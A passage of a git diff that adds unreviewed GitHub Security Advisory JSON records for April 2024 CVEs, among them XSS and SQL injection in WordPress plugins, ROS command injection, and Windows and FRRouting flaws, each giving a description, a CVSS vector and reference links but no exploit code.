"CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T00:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3256-mcj5-3pwf/GHSA-3256-mcj5-3pwf.json b/advisories/unreviewed/2024/04/GHSA-3256-mcj5-3pwf/GHSA-3256-mcj5-3pwf.json new file mode 100644 index 00000000000..b6689686455 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3256-mcj5-3pwf/GHSA-3256-mcj5-3pwf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3256-mcj5-3pwf", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2226" + ], + "details": "The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the id parameter in the google-map block in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access and higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2226" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3050429/otter-blocks" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/217d3148-d411-4fff-a4f6-d5d02ef207af?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-328p-7mr3-3mxp/GHSA-328p-7mr3-3mxp.json b/advisories/unreviewed/2024/04/GHSA-328p-7mr3-3mxp/GHSA-328p-7mr3-3mxp.json new file mode 100644 index 00000000000..6853587b9e3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-328p-7mr3-3mxp/GHSA-328p-7mr3-3mxp.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-328p-7mr3-3mxp", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30661" + ], + "details": "An unauthorized access vulnerability has been discovered in ROS Melodic Morenia versions where ROS_VERSION is 1 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized information access to multiple ROS nodes remotely. Unauthorized information access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30661" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30661" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-32gp-xwx5-8mwj/GHSA-32gp-xwx5-8mwj.json b/advisories/unreviewed/2024/04/GHSA-32gp-xwx5-8mwj/GHSA-32gp-xwx5-8mwj.json new file mode 100644 index 00000000000..bc565b62436 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-32gp-xwx5-8mwj/GHSA-32gp-xwx5-8mwj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-32gp-xwx5-8mwj", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2027" + ], + "details": "The Real Media Library: Media Library Folder & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its style attributes in all versions up to, and including, 4.22.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2027" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3050229%40real-media-library-lite%2Ftrunk&old=3041112%40real-media-library-lite%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/67a44d4c-da3f-4c3d-997b-1417c6906a9c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-32hx-73r8-7rv4/GHSA-32hx-73r8-7rv4.json b/advisories/unreviewed/2024/04/GHSA-32hx-73r8-7rv4/GHSA-32hx-73r8-7rv4.json new file mode 100644 index 00000000000..e662aa51e68 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-32hx-73r8-7rv4/GHSA-32hx-73r8-7rv4.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-32hx-73r8-7rv4", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-3216" + ], + "details": "The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wt_pklist_reset_settings() function in all versions up to, and including, 4.4.2. This makes it possible for unauthenticated attackers to reset all of the plugin's settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3216" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/print-invoices-packing-slip-labels-for-woocommerce/trunk/admin/class-wf-woocommerce-packing-list-admin.php#L4262" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aeac9c4a-0754-4fb1-bf11-0cd8483451b6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T04:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-32qf-5pwg-7x24/GHSA-32qf-5pwg-7x24.json b/advisories/unreviewed/2024/04/GHSA-32qf-5pwg-7x24/GHSA-32qf-5pwg-7x24.json new file mode 100644 index 00000000000..7e1802e0c24 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-32qf-5pwg-7x24/GHSA-32qf-5pwg-7x24.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-32qf-5pwg-7x24", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2792" + ], + "details": "The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widgets in all versions up to, and including, 1.13.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2792" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13#modules/image-compare/widgets" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/image-compare/widgets/image-compare.php#L508" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/image-compare/widgets/image-compare.php#L521" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3058768%40addon-elements-for-elementor-page-builder&new=3058768%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dcc5a611-23bf-499e-8141-684458d9ce3b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-33g4-2m49-x49h/GHSA-33g4-2m49-x49h.json b/advisories/unreviewed/2024/04/GHSA-33g4-2m49-x49h/GHSA-33g4-2m49-x49h.json new file mode 100644 index 00000000000..77c75e07a6b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-33g4-2m49-x49h/GHSA-33g4-2m49-x49h.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33g4-2m49-x49h", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6967" + ], + "details": "The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to SQL Injection via shortcode in all versions up to, and including, 3.0.10 (with the exception of 2.7.31.2, 2.8.23.2, 2.9.19.2) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor level access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6967" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/pods/trunk/classes/PodsView.php#L750" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3039486%40pods%2Ftrunk&old=3039467%40pods%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1aa7d0c2-27ec-47ad-8baa-c281c273078e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-33m3-hvgx-q2v6/GHSA-33m3-hvgx-q2v6.json b/advisories/unreviewed/2024/04/GHSA-33m3-hvgx-q2v6/GHSA-33m3-hvgx-q2v6.json new file mode 100644 index 00000000000..a569dcd307b --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-33m3-hvgx-q2v6/GHSA-33m3-hvgx-q2v6.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33m3-hvgx-q2v6", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1990" + ], + "details": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to blind SQL Injection via the ‘id’ parameter of the RM_Form shortcode in all versions up to, and including, 5.3.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1990" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3049490/custom-registration-form-builder-with-submission-manager/trunk/public/class_rm_public.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3057216/custom-registration-form-builder-with-submission-manager/trunk/public/class_rm_public.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6478cdbc-a20e-4fe2-bbd6-8a550e5da895?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-33px-qmc3-m5x2/GHSA-33px-qmc3-m5x2.json b/advisories/unreviewed/2024/04/GHSA-33px-qmc3-m5x2/GHSA-33px-qmc3-m5x2.json new file mode 100644 index 00000000000..400298e25af --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-33px-qmc3-m5x2/GHSA-33px-qmc3-m5x2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33px-qmc3-m5x2", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-2656" + ], + "details": "The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a CSV import in all versions up to, and including, 5.7.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2656" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3063438/email-subscribers/trunk/lite/includes/classes/class-es-import-subscribers.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/159ddb06-e7c4-4279-a8a1-c78a02e15891?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T04:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-33wg-9hcm-96gg/GHSA-33wg-9hcm-96gg.json b/advisories/unreviewed/2024/04/GHSA-33wg-9hcm-96gg/GHSA-33wg-9hcm-96gg.json new file mode 100644 index 00000000000..02a2d8daa2c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-33wg-9hcm-96gg/GHSA-33wg-9hcm-96gg.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33wg-9hcm-96gg", + "modified": "2024-04-08T09:31:12Z", + "published": "2024-04-08T09:31:12Z", + "aliases": [ + "CVE-2024-30665" + ], + "details": "An OS command injection vulnerability has been discovered in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3. This vulnerability primarily affects the command processing or system call components in ROS, making them susceptible to manipulation by malicious entities. Through this, unauthorized commands can be executed, leading to remote code execution (RCE), data theft, and malicious activities. The affected components include External Command Execution Modules, System Call Handlers, and Interface Scripts.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30665" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30665" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T07:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-33x5-jqpp-33fv/GHSA-33x5-jqpp-33fv.json b/advisories/unreviewed/2024/04/GHSA-33x5-jqpp-33fv/GHSA-33x5-jqpp-33fv.json new file mode 100644 index 00000000000..b0e0666789d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-33x5-jqpp-33fv/GHSA-33x5-jqpp-33fv.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-33x5-jqpp-33fv", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-1991" + ], + "details": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the update_users_role() function in all versions up to, and including, 5.3.0.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to escalate their privileges to that of an administrator", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1991" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk//services/class_rm_user_services.php#L1205" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3049490/custom-registration-form-builder-with-submission-manager#file24" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/766e3966-157a-4db3-9179-813032343f76?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-34jp-w7ww-7cwj/GHSA-34jp-w7ww-7cwj.json b/advisories/unreviewed/2024/04/GHSA-34jp-w7ww-7cwj/GHSA-34jp-w7ww-7cwj.json new file mode 100644 index 00000000000..f4027c0e0ef --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-34jp-w7ww-7cwj/GHSA-34jp-w7ww-7cwj.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-34jp-w7ww-7cwj", + "modified": "2024-04-07T12:31:03Z", + "published": "2024-04-07T12:31:03Z", + "aliases": [ + "CVE-2024-3420" + ], + "details": "A vulnerability was found in SourceCodester Online Courseware 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file admin/saveedit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259592.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3420" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-05.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259592" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259592" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311598" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T11:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-354p-799c-vqvc/GHSA-354p-799c-vqvc.json b/advisories/unreviewed/2024/04/GHSA-354p-799c-vqvc/GHSA-354p-799c-vqvc.json new file mode 100644 index 00000000000..75986dc33ce --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-354p-799c-vqvc/GHSA-354p-799c-vqvc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-354p-799c-vqvc", + "modified": "2024-04-09T21:31:57Z", + "published": "2024-04-09T21:31:57Z", + "aliases": [ + "CVE-2024-0873" + ], + "details": "The Watu Quiz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'watu-basic-chart' shortcode in all versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0873" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3036986" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c31732fa-eb35-4932-bee6-08955a14b010?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-35gg-3hw5-mf59/GHSA-35gg-3hw5-mf59.json b/advisories/unreviewed/2024/04/GHSA-35gg-3hw5-mf59/GHSA-35gg-3hw5-mf59.json new file mode 100644 index 00000000000..e2e866c0bd5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-35gg-3hw5-mf59/GHSA-35gg-3hw5-mf59.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-35gg-3hw5-mf59", + "modified": "2024-04-09T18:30:26Z", + "published": "2024-04-09T18:30:26Z", + "aliases": [ + "CVE-2024-26254" + ], + "details": "Microsoft Virtual Machine Bus (VMBus) Denial of Service Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26254" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26254" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-822" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3656-hc57-pfv2/GHSA-3656-hc57-pfv2.json b/advisories/unreviewed/2024/04/GHSA-3656-hc57-pfv2/GHSA-3656-hc57-pfv2.json new file mode 100644 index 00000000000..1897209a927 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3656-hc57-pfv2/GHSA-3656-hc57-pfv2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3656-hc57-pfv2", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26223" + ], + "details": "Windows DNS Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26223" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26223" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-368r-9597-529x/GHSA-368r-9597-529x.json b/advisories/unreviewed/2024/04/GHSA-368r-9597-529x/GHSA-368r-9597-529x.json new file mode 100644 index 00000000000..615c09103e2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-368r-9597-529x/GHSA-368r-9597-529x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-368r-9597-529x", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26079" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26079" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-36p4-cjjg-rccj/GHSA-36p4-cjjg-rccj.json b/advisories/unreviewed/2024/04/GHSA-36p4-cjjg-rccj/GHSA-36p4-cjjg-rccj.json new file mode 100644 index 00000000000..01bc3962060 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-36p4-cjjg-rccj/GHSA-36p4-cjjg-rccj.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-36p4-cjjg-rccj", + "modified": "2024-04-07T21:30:28Z", + "published": "2024-04-07T21:30:28Z", + "aliases": [ + "CVE-2024-31950" + ], + "details": "In FRRouting (FRR) through 9.1, there can be a buffer overflow and daemon crash in ospf_te_parse_ri for OSPF LSA packets during an attempt to read Segment Routing subTLVs (their size is not validated).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31950" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15674" + }, + { + "type": "WEB", + "url": "https://github.com/FRRouting/frr/pull/15674/commits/6b84541df71772f697a7f9e6b2aaf72536aab775" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T21:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-3898-wjpq-fj5f/GHSA-3898-wjpq-fj5f.json b/advisories/unreviewed/2024/04/GHSA-3898-wjpq-fj5f/GHSA-3898-wjpq-fj5f.json new file mode 100644 index 00000000000..0735488ab27 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-3898-wjpq-fj5f/GHSA-3898-wjpq-fj5f.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3898-wjpq-fj5f", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2428" + ], + "details": "The Ultimate Video Player For WordPress WordPress plugin before 2.2.3 does not have proper capability check when updating its settings via a REST route, allowing Contributor and above users to update them. Furthermore, due to the lack of escaping in one of the settings, this also allows them to perform Stored XSS attacks", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2428" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/4832e223-4571-4b45-97db-2fd403797c49" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-38jr-26cr-gjff/GHSA-38jr-26cr-gjff.json b/advisories/unreviewed/2024/04/GHSA-38jr-26cr-gjff/GHSA-38jr-26cr-gjff.json new file mode 100644 index 00000000000..4ae5055fe67 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-38jr-26cr-gjff/GHSA-38jr-26cr-gjff.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-38jr-26cr-gjff", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3119" + ], + "details": "A buffer overflow vulnerability exists in all versions of sngrep since v0.4.2, due to improper handling of 'Call-ID' and 'X-Call-ID' SIP headers. The functions sip_get_callid and sip_get_xcallid in sip.c use the strncpy function to copy header contents into fixed-size buffers without checking the data length. This flaw allows remote attackers to execute arbitrary code or cause a denial of service (DoS) through specially crafted SIP messages.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3119" + }, + { + "type": "WEB", + "url": "https://github.com/irontec/sngrep/pull/480/commits/73c15c82d14c69df311e05fa75da734faafd365f" + }, + { + "type": "WEB", + "url": "https://github.com/irontec/sngrep/releases/tag/v1.8.1" + }, + { + "type": "WEB", + "url": "https://pentraze.com/vulnerability-reports" + } + ], + 